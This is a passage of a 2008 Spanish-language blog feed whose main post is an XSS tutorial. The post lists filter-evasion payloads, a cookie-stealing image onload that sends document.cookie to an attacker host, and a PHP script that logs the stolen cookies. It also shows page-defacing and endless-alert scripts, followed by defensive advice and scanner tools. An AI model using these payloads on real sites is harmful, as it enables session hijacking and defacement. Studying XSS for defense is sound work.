<p class="MsoBodyText"><span lang="ES-MX">Se da por ejemplo en un foro cuando se pueden introducir etiquetas y ejecutar un código. Funciona localizando puntos débiles en la programación de los filtros, por lo que al filtrar las etiquetas<span>  </span>&lt;iframe&gt;, &lt;script&gt; etc, es posible colocar un &lt;div malicioso, o incluso un &lt;u&gt; o &lt;s&gt;, etc que casi siempre están permitidas.<br />
</span><span>Texto que se puede utilizar como una prueba de ataques XSS: </span></p>
<p class="Textopreformateado"><span lang="EN-US">&lt;IMG SRC=&#8221;javascript:alert(&#8216;XSS&#8217;);&#8221;&gt;</span></p>
<p class="Textopreformateado">Nota: con el siguiente ejemplo las cadenas son más largas de lo que deberían, ya que los ceros pueden omitirse. Frecuentemente se puede ver que los filtros asumen que la codificación hex y dec debe de ser de dos o tres caracteres.</p>
<p class="Textopreformateado"><span lang="EN-US">&lt;IMG SRC=&#8221;jav ascript:alert(&#8216;XSS&#8217;);&#8221;&gt;</span></p>
<p class="Textopreformateado">Espacios y metacaracteres antes del javascript en imágenes para XSS (es útil si el patrón coincide, no usa espacios en la palabra javascript, y asume que puedes tener espacios entre las comillas y la palabra clave javascript. La realidad es que se puede tener cualquier carácter desde el uno al treinta y dos en decimal.)</p>
<p class="Textopreformateado"><span lang="EN-US">&lt;IMG SRC=&#8221; &amp;#14;  javascript:alert(&#8216;XSS&#8217;);&#8221;&gt;</span></p>
<p class="Textopreformateado"><span lang="ES-MX">No alfa no digitos XSS. Firefox asume que ninguna letra o digito es valido después de HTML por lo tanto consiste en un espacio en blanco o un token no valido después de una etiqueta HTML. El problema es que algunos filtros asumen que la etiqueta HTML esta incompleta debido al espacio en blanco.</span></p>
<p class="Textopreformateado"><span lang="EN-US">&lt;SCRIPT&amp;XSS SRC=&#8221;http://ha.ckers.org/xss.js&#8221;&gt;&lt;/SCRIPT&gt;</span></p>
<p class="Textopreformateado">Usando INPUT image:</p>
<p class="Textopreformateado"><span lang="EN-US">&lt;INPUT TYPE=&#8221;IMAGE&#8221; SRC=&#8221;javascript:alert(&#8216;XSS&#8217;);&#8221;&gt;</span></p>
<p class="Textopreformateado"><span lang="ES-MX">&lt;BR SIZE=&#8221;&amp;{alert(&#8216;XSS&#8217;)}&#8221;&gt;</span></p>
<p class="Textopreformateado"><span lang="EN-US">&lt;FK STYLE=&#8221;behavior: url(http://ha.ckers.org/xss.htc);&#8221;&gt;</span></p>
<p class="Textopreformateado"><span lang="EN-US">&lt;DIV STYLE=&#8221;background-image: url(javascript:alert(&#8216;XSS&#8217;))&#8221;&gt;</span></p>
<p class="MsoBodyText">Usar Style es increíblemente fácil, y muchos filtros son vulnerables. Sin embargo no es posible meter todo en el espacio que disponible, pero se puede usar:</p>
<p class="Textopreformateado"><span lang="ES-MX">eval(this.fu)</span></p>
<p class="Textopreformateado"><span lang="ES-MX">y en el div, agregar un campo &#8220;fu&#8221; con el código</span></p>
<p class="Textopreformateado"><span lang="EN-US">&lt;div fu=&#8221;alert(&#8216;Hola&#8217;);&#8221; STYLE=&#8221;background-image: </span></p>
<p class="Textopreformateado"><span lang="EN-US">url(javascript:eval(this.fu))&#8221;&gt;</span></p>
<p class="MsoNormal"><span lang="ES-MX">Si no se tiene una validación debida de las entradas por parte del usuario, se pueden enviar cadenas con comandos ocultos en vínculos que se almacenaran y reflejaran en nuestro sitio por ejemplo: </span></p>
<p class="MsoNormal">Un atacante aprovecha la vulnerabilidad de nuestro sitio y publica una imagen de la siguiente manera:</p>
<p class="MsoNormal"><span><br />
</span><span lang="EN-US">http://www.mipagina-malosa.com/mifoto.jpg name=&#8221;foto&#8221; </span></p>
<p class="MsoNormal">Pero a la vez agrega lo siguiente a dicho vínculo de la imagen:</p>
<p class="MsoNormal"><span lang="ES-MX"> <span lang="ES-MX">onload=&#8221;foto.src=&#8217;http://www.mipagina-malosa.com/foto.php? galleta=&#8217;%20+document.cookie;&#8221;&gt;</span><span lang="ES-MX"> </span></span></p>
<p class="MsoNormal"><span lang="ES-MX">Como podemos imaginar al finalizar la carga de la imagen se almacenaran las cookies del usuario que siguió el vinculo en una misteriosa variable llamada galleta, que será enviada a la url determinada por el atacante, ahora veamos el código de dicha página:</span></p>
<p>Código de foto.php.</p>
<p class="MsoNormal"><span lang="EN-US">&lt;? $galleta = $_REQUEST[galleta]; </span></p>
<p class="MsoNormal"><span lang="EN-US">$file=fopen(&#8220;cookies.txt&#8221;, &#8220;a&#8221;); </span></p>
<p class="MsoNormal"><span lang="EN-US">fput($file, &#8220;$galleta\n&#8221;); </span></p>
<p class="MsoNormal"><span lang="EN-US">fclose($file); ?&gt; </span></p>
<p class="MsoNormal"><span><br />
</span><span lang="ES-MX">Observemos que la variable que contiene las cookies del usuario será almacenada en un documento de texto llamado cookies.txt alojado en el servidor del atacante, ya esto significa un agujero de seguridad en nuestro sitio que expone peligrosamente la seguridad de nuestro usuario. </span></p>
<p class="MsoNormal"><span lang="ES-MX"> <strong>Indirecta</strong></span></p>
<p class="MsoNormal"><span> Es posible, cuando hay un mensaje o una ruta en la URL del navegador o en la cookie,</span></p>
<p class="MsoBodyText"><span lang="ES-MX"> saber el contenido de una cookie sin usar ningún tipo de iecv o add-on para el navegador, se puede usar el siguiente script, solo colocándolo en la barra de direcciones</span></p>
<p class="Textopreformateado"><span lang="ES-MX"> javascript:void(document.cookie=prompt(&#8220;Alterar Cookie&#8221;,document.cookie).split(&#8220;;&#8221;));</span></p>
<p class="Textopreformateado"><a href="http://togusds.files.wordpress.com/2008/09/clip_image002.jpg"><img class="alignleft size-medium wp-image-4" title="clip_image002" src="http://togusds.files.wordpress.com/2008/09/clip_image002.jpg?w=300&#038;h=69" alt="" width="300" height="69" /></a></p>
<p class="MsoBodyText"> </p>
<p class="MsoBodyText"> </p>
<p class="MsoBodyText"><span lang="ES-MX">Una vez dentro es posible modificar la cookie como se desee. Como podemos observar allí se encuentra nuestra cookie en un cuadro de dialogo que a la vez nos permite modificarla, así que haremos clic al final de la cookie y agregaremos un texto a ver si la modifica y presionamos el botón aceptar del cuadro de dialogo, como el script aun esta en el navegador simplemente volveremos a presionar la tecla ENTER o haremos clic sobre el botón IR y veremos nuevamente el cuadro de dialogo. </span></p>
<p class="MsoNormal"><a href="http://togusds.files.wordpress.com/2008/09/clip_image003.jpg"><img class="alignnone size-medium wp-image-5" title="clip_image003" src="http://togusds.files.wordpress.com/2008/09/clip_image003.jpg?w=300&#038;h=68" alt="" width="300" height="68" /></a></p>
<p class="MsoNormal"><span lang="ES-MX"><br />
Si observamos al final de la cookie veremos que efectivamente se modifico nuestra cookie, bien de esa misma manera pueden ser extraídas y modificadas nuestras cookies de manera remota. </span></p>
<p class="MsoNormal"><span lang="ES-MX"><br />
</span></p>
<p class="MsoBodyText"><strong><span lang="ES-MX">Usando FrameSets</span></strong></p>
<p class="MsoNormal"><span lang="ES-MX">Este tipo de ataque por medio del Cross-Site-Scripting es menos frecuente que el ataque a los usuarios, pero aun así existen personas que se deleitan fastidiando un sitio web por puro placer y consiste en poder almacenar scripts que se reflejen en el sitio para causar alguna alteración o eliminación del mismo.</span></p>
<p class="MsoNormal"><span lang="ES-MX">Tomaremos como referencia un blog ya que sitios como blogs, foros y libros de visita, son los que mas fácilmente permiten este tipo de ataques, debido que en muchas ocasiones permiten el formateo de nuestro texto con etiquetas HTML y no validan correctamente el tipo de inserción que estamos haciendo. </span></p>
<p class="MsoNormal">Veamos un ejemplo simple. Hagamos un post como este:</p>
<p class="MsoNormal"><span lang="ES-MX">&lt;script&gt;alert(&#8220;hola&#8221;);&lt;/script&gt;<br />
Al cargar la página donde se refleja nuestro post aparecerá una ventanita como esta. </span></p>
<p class="MsoNormal"><a href="http://togusds.files.wordpress.com/2008/09/clip_image004.jpg"><img class="alignnone size-full wp-image-6" title="clip_image004" src="http://togusds.files.wordpress.com/2008/09/clip_image004.jpg?w=215&#038;h=107" alt="" width="215" height="107" /></a></p>
<p class="MsoNormal"><span lang="ES-MX"> </span></p>
<p class="MsoNormal"><span lang="ES-MX">Bien parece algo gracioso, un pequeño saludo de entrada, pero ahora quizás a ese hola podemos agregarle algo más: </span></p>
<p class="MsoNormal"><span lang="ES-MX">&lt;script&gt;while(1)alert(&#8220;hola&#8221;);&lt;/script&gt;<br />
 Al cargar la pagina aparecerá la misma ventanita de saludo pero esta vez al darle clic volverá a aparecer, flotando en nuestro navegador, ya que siempre que demos clic en el botón aceptar del cuadro de dialogo seguirá apareciendo la misma ventanita, evitando toda posibilidad de interactuar con el sitio ya que la única forma de cerrar este cuadro de dialogo es cerrando la web que lo ejecuta, de esta manera dejo de ser gracioso y empieza a ser molesto, pero hasta aquí llegaron los principiantes. </span></p>
<p class="MsoNormal"><span lang="ES-MX">Alguien más experimentado en el XSS podría intentar algo como:</span></p>
<p class="MsoNormal"><span lang="EN-US">&lt;iframe src=http://mipagina.com/pagina.htm&gt; </span></p>
<p class="MsoNormal"><span lang="ES-MX">Y en el código de pagina.htm algo como esto: </span></p>
<p class="MsoNormal"><span lang="EN-US">&lt;SCRIPT TYPE=&#8221;text/javascript&#8221; LANGUAGE=JAVASCRIPT&gt; </span></p>
<p class="MsoNormal"><span lang="EN-US">if (top.frames.length!=0) </span></p>
<p class="MsoNormal"><span lang="EN-US">top.location=self.document.location; &lt;/SCRIPT&gt; </span></p>
<p class="MsoNormal"><span lang="ES-MX">Como es posible observar cada vez que se ingrese a la página donde se refleja esta inyección se mostrara pagina.htm como frame superior. Algo más dañino podría ser el <span> </span>eliminar todo el contenido de la página de post y remplazarlo por un mensaje, se logra de una manera tan sencilla como esta: </span></p>
<p class="MsoNormal"><span lang="ES-MX">&lt;script&gt;document.documentElement.innerHTML=&#8221;Borrada&#8221;;&lt;/script&gt;<br />
</span></p>
<p class="MsoBodyText"><span lang="ES-MX">Otro uso común para estas vulnerabilidades es lograr hacer phishing, o colocar un Xploit, en la barra de direcciones muestra una cierta página, pero realmente se esta navegando en otra.</span></p>
<p class="MsoBodyText">Robo de cookies</p>
<p class="MsoNormal"><span lang="ES-MX">XSS es el método que se utiliza para el robo de cookies y otros datos importantes de los sitios web y permitirá, entre otras cosas, hacernos con las cookies de diferentes personas en un sitio especifico haciéndonos pasar por ellos en caso necesario, podríamos digamos, hacernos con la cookie del administrador de un foro o de un sitio en especifico que no tiene la debida protección o no pusieron el debido cuidado a la hora de hacer sus códigos.</span></p>
<p class="MsoNormal"><strong>¿Como protegerse?</strong></p>
<p class="MsoNormal"><span lang="ES-MX">La respuesta es muy sencilla. Si se es desarrollador: nunca confiar en la información enviada por los usuarios, y siempre hacer un filtro de los meta caracteres. Esto eliminara la mayoría de los ataques XSSS convertir <em>“&lt; “y “&gt; “ a &amp;lt; y &amp;gt; sin embargo esto no nos asegura nada. </em></span><em><span>También es necesario cambiar ( ) por </span></em><em><span>(</span></em><em><span> y </span></em><em><span>)</span></em><em><span>, &#8221; a </span></em><em><span>&#8220;</span></em><em><span>, &#8216; a </span></em><em><span>&amp;#39, y también #<span>  </span>&amp; a &amp;#35<span>  </span>y<span>  </span>&amp;#38</span></em><em><span>.</span></em></p>
<p class="MsoNormal"><span> Sin embargo los atacantes frecuentemente utilizan una gran variedad de métodos para codificar la porción dañina de una etiqueta, como Unicode, de esa manera las peticiones se ven menos sospechosas para los usuarios. Existen cientos de variantes de estos ataques, incluyendo versiones que ni siquiera requieren de los símbolos &lt;&gt;. En lugar de ellos es recomendable validar las entradas con una rigurosa especificación de lo que se puede esperar de un ataque típico de XSS. Aunque la mayoría de los ataques están escritos en JavaScript cualquier contenido activo es una fuente potencial de peligro, incluyendo: ActiveX (OLE), VBScript, Shockwave, Flash, etc.</span></p>
<p class="MsoNormal"><span> El proyecto de filtros de OSWAP<a name="_ftnref1"></a> esta produciendo componentes reutilizables en diversos lenguajes, para ayudar a prevenir muchas formas de parámetros corruptos, incluyendo los ataques XSS. Además el proyecto WebGoat<a name="_ftnref2"></a> de la misma organización tiene lecciones acerca del XSS y cifrado de datos.</span></p>
<p class="MsoNormal"><span>Si es un usuario bastará con hacer clic en las páginas del sitio que estamos visitando, y si en algún momento se desea ir a otra página entonces se deberá ir a la página principal en lugar de hacer clic en los enlaces de la primera página. Esto podría eliminar el 90% de las amenazas. Otra manera de prevenir ataque es deshabilitar la ejecución de javascript desde la configuración de nuestro explorador. </span></p>
<p class="MsoNormal"><span> Herramientas</span></p>
<h3><span lang="ES-MX">Extensión para FireFox XSS Me 0.3.0</span></h3>
<h4><span lang="ES-MX"><span style="font-weight:normal;">Es una herramienta utilizada para reflejar los ataques de XSS cross site scripting. Es importante señalar que no realiza pruebas para procedimientos almacenados del tipo XSS.rnm. la herramienta trabaja enviando las formas HTML</span><span><span style="font-weight:normal;">  </span></span><span style="font-weight:normal;">y substituyendo los valores con cadenas que son representativas de un ataque XSS. La página</span><span><span style="font-weight:normal;">  </span></span><span style="font-weight:normal;">resultante configura un valor de java (document.vulnerable=true) de esta manera sabemos que la página es vulnerable a un ataque de XSS. La herramienta no atenta contra la seguridad del sistema dado. Busca por posibles puntos vulnerables a un ataque contra el sistema. La herramienta no hace un escaneo de puertos, un sniffing de paquetes, hackeo de passwords o ataques al firewall. De hecho es posible ver a esta herramienta como las que utilizan los aseguradores de calidad.</span></span></h4>
<p><span lang="ES-MX"><strong>Acunetix WVS (Web Vulnerability Scanner)</strong></span></p>
<p><span lang="ES-MX">Los hackers esta en búsqueda de vulnerabilidades del Cross Site Scripting (XSS) en cada aplicación Web de la red: Carros de compra, paginas de ingreso, los contenido dinámicos son blancos fáciles. Acunetix WVS nos permite escanear una aplicación Web para localizar estos errores.</span></p>
<p> </p>
<ul>
<li><span lang="ES-MX">Prueba una aplicación para encontrar vulnerabilidades como XSS, inyección de SQL, entre otras.</span></li>
<li><span lang="ES-MX">Los firewall, SSL y servidores a prueba de fallas son inútiles cuando hablamos de hackear una página Web.</span></li>
<li><span lang="ES-MX"><span><span> </span></span></span><span lang="ES-MX">Acunetix verifica el código fuente para buscar errores que puedan ser explotados por XSS</span></li>
</ul>
<div>Nota Importante:</div>
<div>El contenido de esta web ha sido una traducción de diversas, fuentes no debe de utilizarse mas que como una fuente de información y el autor no se hace responsable del uso que se le pueda dar a esta información.</div>
<p><strong>Bibliografía</strong></p>
<p class="Contenidodelatabla"><em><span lang="EN-US">The webappsec mailing list ( <a href="http://www.securityfocus.com/"><span>www.securityfocus.com</span></a>)</span></em></p>
<p class="Contenidodelatabla"><em><span lang="EN-US">webappsec@securityfocus.com<br />
Published to the Public May 2002Copyright May 2002 Cgisecurity.com</span></em></p>
<p class="MsoBodyText"><span lang="EN-US"> <a href="http://foro.elhacker.net/tutoriales_documentacion/los_poderes_secretos_de_xss_cross_site_scripting-t98324.0.html"><span lang="EN-US">http://foro.elhacker.net/tutoriales_documentacion/los_poderes_secretos_de_xss_cross_site_scripting-t98324.0.html</span></a></span></p>
<p class="MsoBodyText"> </p>
<p class="MsoBodyText"><span lang="ES-MX"><a href="http://www.owasp.org/index.php/Cross_Site_Scripting"><span lang="EN-US">http://www.owasp.org/index.php/Cross_Site_Scripting</span></a></span></p>
<p class="MsoBodyText"><span lang="ES-MX"><a href="http://ha.ckers.org/xss.html"><span lang="EN-US">http://ha.ckers.org/xss.html</span></a></span></p>
<p class="MsoBodyText"><span lang="ES-MX"> </span></p>
<div>
<hr size="1" />
<div id="ftn1">
<p class="MsoFootnoteText"><a name="_ftn1"></a><span lang="ES-MX"> http://www.owasp.org/index.php/Category:OWASP_Filters_Project</span></p>
</div>
<div id="ftn2">
<p class="MsoFootnoteText"><a name="_ftn2"></a><span lang="ES-MX"> http://www.owasp.org/index.php/Category:OWASP_WebGoat_Project </span></p>
</div>
</div>
<img alt="" border="0" src="http://feeds.wordpress.com/1.0/categories/togusds.wordpress.com/3/" /> <img alt="" border="0" src="http://feeds.wordpress.com/1.0/tags/togusds.wordpress.com/3/" /> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/togusds.wordpress.com/3/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/togusds.wordpress.com/3/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/togusds.wordpress.com/3/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/togusds.wordpress.com/3/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/togusds.wordpress.com/3/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/togusds.wordpress.com/3/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/togusds.wordpress.com/3/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/togusds.wordpress.com/3/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/togusds.wordpress.com/3/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/togusds.wordpress.com/3/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=togusds.wordpress.com&blog=4815317&post=3&subd=togusds&ref=&feed=1" /></div>]]></content:encoded>
			<wfw:commentRss>http://togusds.wordpress.com/2008/09/11/xss/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
	
		<media:content url="http://1.gravatar.com/avatar/dd3e4a6c7b6fc913f4ae2ec945898ff9?s=96&#38;d=identicon" medium="image">
			<media:title type="html">togusds</media:title>
		</media:content>

		<media:content url="http://togusds.files.wordpress.com/2008/09/clip_image002.jpg?w=300" medium="image">
			<media:title type="html">clip_image002</media:title>
		</media:content>

		<media:content url="http://togusds.files.wordpress.com/2008/09/clip_image003.jpg?w=300" medium="image">
			<media:title type="html">clip_image003</media:title>
		</media:content>

		<media:content url="http://togusds.files.wordpress.com/2008/09/clip_image004.jpg" medium="image">
			<media:title type="html">clip_image004</media:title>
		</media:content>
	</item>
		<item>
		<title>Hello world!</title>
		<link>http://togusds.wordpress.com/2008/09/11/hello-world/</link>
		<comments>http://togusds.wordpress.com/2008/09/11/hello-world/#comments</comments>
		<pubDate>Thu, 11 Sep 2008 02:32:54 +0000</pubDate>
		<dc:creator>togusds</dc:creator>
				<category><![CDATA[Personal]]></category>
		<category><![CDATA[Uncategorized]]></category>

		<guid isPermaLink="false"></guid>
		<description><![CDATA[Hola, pues este blog estará dedicado a varias cosas, seguridad y auditoria informatica, cosas relativas a Shakira y al pequeño gran mundo de los videojuegos, espero sus comentarios
       <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=togusds.wordpress.com&blog=4815317&post=1&subd=togusds&ref=&feed=1" />]]></description>
			<content:encoded><![CDATA[<div class='snap_preview'><br /><p>Hola, pues este blog estará dedicado a varias cosas, seguridad y auditoria informatica, cosas relativas a Shakira y al pequeño gran mundo de los videojuegos, espero sus comentarios</p>
<img alt="" border="0" src="http://feeds.wordpress.com/1.0/categories/togusds.wordpress.com/1/" /> <img alt="" border="0" src="http://feeds.wordpress.com/1.0/tags/togusds.wordpress.com/1/" /> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/togusds.wordpress.com/1/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/togusds.wordpress.com/1/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/togusds.wordpress.com/1/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/togusds.wordpress.com/1/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/togusds.wordpress.com/1/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/togusds.wordpress.com/1/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/togusds.wordpress.com/1/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/togusds.wordpress.com/1/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/togusds.wordpress.com/1/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/togusds.wordpress.com/1/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=togusds.wordpress.com&blog=4815317&post=1&subd=togusds&ref=&feed=1" /></div>]]></content:encoded>
			<wfw:commentRss>http://togusds.wordpress.com/2008/09/11/hello-world/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
	
		<media:content url="http://1.gravatar.com/avatar/dd3e4a6c7b6fc913f4ae2ec945898ff9?s=96&#38;d=identicon" medium="image">
			<media:title type="html">togusds</media:title>
		</media:content>
	</item>
	</channel>
</rss>